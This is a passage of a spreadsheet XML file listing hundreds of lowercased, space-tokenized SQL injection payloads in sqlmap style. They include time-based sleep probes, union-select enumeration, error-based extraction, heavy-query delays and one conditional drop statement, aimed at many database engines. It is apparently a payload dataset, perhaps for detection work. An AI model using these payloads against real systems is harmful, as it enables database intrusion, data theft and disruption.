    <t>1' )  where 4364 = 4364 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-1087 )  where 5787 = 5787 union all select 5787#</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select zukr where 9215 = 9215 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>1" )  union all select null,null#</t>
  </si>
  <si>
    <t>-6505'  )  )   as jtnp where 1037 = 1037 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select  ( case when  ( 8489 = 8820 )  then 1 else 0x28 end  )  )   and   (  (  'fbjf' = 'fbjf</t>
  </si>
  <si>
    <t>-7333%"  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1' and make_set ( 8403 = 8403,8899 )  and 'fttd' like 'fttd</t>
  </si>
  <si>
    <t xml:space="preserve">1'  )  )  </t>
  </si>
  <si>
    <t>1%"  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and  ( 'eaxu' = 'eaxu</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 6035 = 9882 )  then 6035 else 6035* ( select 6035 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>-8812" )  where 1646 = 1646 union all select 1646,1646,1646,1646,1646,1646--</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'pqxe' like 'pqxe</t>
  </si>
  <si>
    <t>-8409%' )  or make_set ( 9354 = 9354,7185 )  and  ( '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  rlike sleep ( 5 ) </t>
  </si>
  <si>
    <t>1'  )  )   )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 'raus' = 'raus</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 2084 = 5671,1,1/0 ) </t>
  </si>
  <si>
    <t>1" or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and "pnub" = "pnub</t>
  </si>
  <si>
    <t>1' )  where 4297 = 4297 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1 )  where 5336 = 5336 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  union all select null,null#</t>
  </si>
  <si>
    <t>-2979'  )  )   as klou where 7092 = 7092 union all select 7092,7092--</t>
  </si>
  <si>
    <t>1'  )  )   as hzbj where 1725 = 1725 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'bwqc' from dual where 6897 = 6897 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'sbip' from dual where 7302 = 7302 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve">1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t>-5698'  )  )   as egjr where 5586 = 5586 union all select 5586,5586,5586--</t>
  </si>
  <si>
    <t xml:space="preserve">1%' ) </t>
  </si>
  <si>
    <t>1%"  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>-2717'  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>1'+ ( select lqhd where 4251 = 4251 and  ( 8754 = 5779 ) *5779 ) +'</t>
  </si>
  <si>
    <t>-4586' )  as shdb where 6176 = 6176 union all select 6176,6176,6176,6176#</t>
  </si>
  <si>
    <t>1  )  )   as mmby where 3990 = 3990 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1%'  )  )   ) </t>
  </si>
  <si>
    <t>1 )  where 8302 = 8302 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>-2241  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( 6840 = 6840</t>
  </si>
  <si>
    <t>1'|| ( select 'uyfo' where 1236 = 1236 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  ||'</t>
  </si>
  <si>
    <t>1 )  as qodq where 4945 = 4945 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-6534%'  )  )   or make_set ( 4107 = 9457,9457 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1" and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and "ygzq" like "ygzq</t>
  </si>
  <si>
    <t>-3270%' or elt ( 9404 = 3498,3498 )  and '%' = '</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and 'fbzo' like 'fbzo</t>
  </si>
  <si>
    <t>1 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) # ewsz</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  #</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( "lczw" = "lczw</t>
  </si>
  <si>
    <t>1' )  as sjmt where 6541 = 6541 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" )  where 3390 = 3390</t>
  </si>
  <si>
    <t>1'|| ( select 'zxla' from dual where 7634 = 7634 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve">-1300 )  as rrsm where 1086 = 1086 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>1"  )  )   )  rlike  ( select  ( case when  ( 7975 = 2446 )  then 1 else 0x28 end  )  )   and   (  (   ( "qixm" like "qixm</t>
  </si>
  <si>
    <t>1" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and "buzb" = "buzb</t>
  </si>
  <si>
    <t>-6453%'  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "egxe" = "egxe</t>
  </si>
  <si>
    <t>-2749' )  as fiho where 3531 = 3531 or 2777 = 1485#</t>
  </si>
  <si>
    <t>1'  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'mmfq' = 'mmfq</t>
  </si>
  <si>
    <t>-9389' )  order by 1#</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) </t>
  </si>
  <si>
    <t>1  )  )   or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-4410 where 5749 = 5749 or 1317 = 9823--</t>
  </si>
  <si>
    <t>-9904"  )  )   union all select 9080,9080,9080,9080,9080--</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'nlky' like 'nlky</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  7749 = 7749</t>
  </si>
  <si>
    <t>1' and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and 'eovg' like 'eovg</t>
  </si>
  <si>
    <t>-9247'  )  )   )  union all select 6964,6964,6964,6964,6964,6964,6964,6964,6964--</t>
  </si>
  <si>
    <t>1'  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( 'mzqi' = 'mzqi</t>
  </si>
  <si>
    <t>-7497' )  as kjzt where 3758 = 3758 or 4794 = 9499--</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-2864' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122</t>
  </si>
  <si>
    <t>1  )  )   as rcon where 8190 = 8190 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and "onsd" like "onsd</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null--</t>
  </si>
  <si>
    <t>1" and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( 'ujcx' = 'ujcx</t>
  </si>
  <si>
    <t>-2333' union all select 9714,9714,9714--</t>
  </si>
  <si>
    <t>-4972'  )  )   as kfzc where 8817 = 8817 union all select 8817,8817,8817,8817,8817,8817--</t>
  </si>
  <si>
    <t>1' )  as uwmy where 6980 = 6980</t>
  </si>
  <si>
    <t>-6777%' )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122</t>
  </si>
  <si>
    <t>1" )  where 3943 = 3943 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1" )  as upjw where 3880 = 3880 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1" and  ( 3020 = 3020 ) *6703 and "itpt" = "itpt</t>
  </si>
  <si>
    <t>1'  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 'crus' = 'crus</t>
  </si>
  <si>
    <t>-8701%'  )  )   or  ( 4843 = 1690 ) *1690 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1" )  as drrx where 8633 = 8633 union all select null,null,null--</t>
  </si>
  <si>
    <t>-8425"  )  )   or  ( 6485 = 1127 ) *1127 and   (  (  "qruf" = "qruf</t>
  </si>
  <si>
    <t>1  )  )   as wrhe where 6120 = 6120 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>-1439" or 2849 = 8484 and "pmdl" = "pmdl</t>
  </si>
  <si>
    <t>1'+ ( select cxvy where 7421 = 7421</t>
  </si>
  <si>
    <t xml:space="preserve">1 or sleep ( 5 ) </t>
  </si>
  <si>
    <t>-6160'  )  )   )  or make_set ( 1924 = 4415,4415 )  and   (  (   ( 'hayr' = 'hayr</t>
  </si>
  <si>
    <t>1 )  where 3381 = 3381</t>
  </si>
  <si>
    <t>-4543" )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1' in boolean mode )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1' )  as xagu where 9088 = 9088  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1  )  )   as oqui where 3368 = 3368 order by 1--</t>
  </si>
  <si>
    <t>-5995'  )  )   or 6872 = 6872 and   (  (  'pywh' = 'pywh</t>
  </si>
  <si>
    <t>-9024 )  where 1686 = 1686 or 3069 = 8213--</t>
  </si>
  <si>
    <t>1' )  and 1987 = 3756#</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( 'ggiw' = 'ggiw</t>
  </si>
  <si>
    <t>1'  )  )   rlike sleep ( 5 )  and   (  (  'qitl' like 'qitl</t>
  </si>
  <si>
    <t>-1647'  )  )   union all select 3030,3030,3030,3030,3030,3030,3030--</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) </t>
  </si>
  <si>
    <t>1'+ ( select 'phtz' where 3171 = 3171</t>
  </si>
  <si>
    <t>'1</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( "ldlp" = "ldlp</t>
  </si>
  <si>
    <t>-8279" union all select 6598,6598,6598,6598,6598,6598,6598,6598#</t>
  </si>
  <si>
    <t>1  )  )   as kiqk where 7366 = 7366 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1 where 5080 = 5080</t>
  </si>
  <si>
    <t>1"  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "ddun" = "ddun</t>
  </si>
  <si>
    <t>1%"  )  )   )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-7142'  )  )   union all select 5083,5083,5083,5083#</t>
  </si>
  <si>
    <t>1 where 8333 = 8333 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1' where 3700 = 3700 union all select null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   as tbiq where 7159 = 7159 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'bvic' from dual where 4839 = 4839 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5  )  )  ||'</t>
  </si>
  <si>
    <t>-2393%'  )  )   union all select 2772--</t>
  </si>
  <si>
    <t>-2790'  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>1" where 1452 = 1452 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 2006 = 2006</t>
  </si>
  <si>
    <t>1'+ ( select qugu where 2287 = 2287 order by 1#</t>
  </si>
  <si>
    <t>1' and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and 'hstg' like 'hstg</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 4828 = 2600 )  then 1 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( 'hmtt' like 'hmtt</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) </t>
  </si>
  <si>
    <t>select  ( case when  ( 3444 = 8424 )  then 3444 else 3444* ( select 3444 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-7369 or 9323 = 9323#</t>
  </si>
  <si>
    <t>1%"  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "zyoo" = "zyoo</t>
  </si>
  <si>
    <t>1'|| ( select 'lzzr' where 2477 = 2477</t>
  </si>
  <si>
    <t>1 where 8045 = 8045 union all select null,null,null--</t>
  </si>
  <si>
    <t>-9873" union all select 8020,8020,8020,8020,8020,8020#</t>
  </si>
  <si>
    <t>1' where 4334 = 4334 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1 where 8889 = 8889</t>
  </si>
  <si>
    <t>1"  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>1 )  as fnpq where 5209 = 5209</t>
  </si>
  <si>
    <t>1 )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  where 2775 = 2775 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' )  where 8125 = 8125 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-5830' )  as fivy where 2173 = 2173 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-5825 )  as mflf where 3999 = 3999 or make_set ( 1492 = 7153,7153 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) </t>
  </si>
  <si>
    <t>1" )  and 4760 = 2922</t>
  </si>
  <si>
    <t>-6405%'  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1 where 9620 = 9620 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1" where 7005 = 7005</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 7953 = 3021,1,1/0 ) </t>
  </si>
  <si>
    <t>if ( 7427 = 7800 )  select 7427 else drop function dgir--</t>
  </si>
  <si>
    <t>-5365 or 7517 = 5726--</t>
  </si>
  <si>
    <t>1 where 6221 = 6221 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as oxrr where 6141 = 6141 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-2112 union all select 2995,2995,2995,2995,2995--</t>
  </si>
  <si>
    <t>-2434 )  union all select 8310,8310,8310,8310,8310--</t>
  </si>
  <si>
    <t>1' )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( 'uzxr' = 'uzxr</t>
  </si>
  <si>
    <t>1  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'cozi' from dual where 2607 = 2607 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-4901' union all select 1536,1536,1536,1536,1536,1536,1536#</t>
  </si>
  <si>
    <t>1%'  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-6305"  )  )   )  or 8097 = 2048 and   (  (   ( "euyy" like "euyy</t>
  </si>
  <si>
    <t>-8112'  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and  ( 1044 = 1044</t>
  </si>
  <si>
    <t>1 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  # awpq</t>
  </si>
  <si>
    <t>-4397'  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( 'omqt' = 'omqt</t>
  </si>
  <si>
    <t>1' )  as cgsz where 7194 = 7194 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'lpej' from dual where 8294 = 8294 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  ||'</t>
  </si>
  <si>
    <t>1'  )  )   )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-2032%"  )  )   )  or  ( 3082 = 7155 ) *7155 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as sjzf where 9997 = 9997 and 4193 = 5408</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and 'nmat' like 'nmat</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( 'nhub' = 'nhub</t>
  </si>
  <si>
    <t>1" )  as upyn where 6185 = 6185 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and "eslo" like "eslo</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   and  ( 1248 = 8705 ) *8705 and   (  (  "wvma" like "wvma</t>
  </si>
  <si>
    <t>1%' )  union all select null,null--</t>
  </si>
  <si>
    <t>-8128"  )  )   as ovjz where 7375 = 7375 union all select 7375,7375,7375,7375,7375,7375,7375,7375,7375--</t>
  </si>
  <si>
    <t>1' )  where 6731 = 6731 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
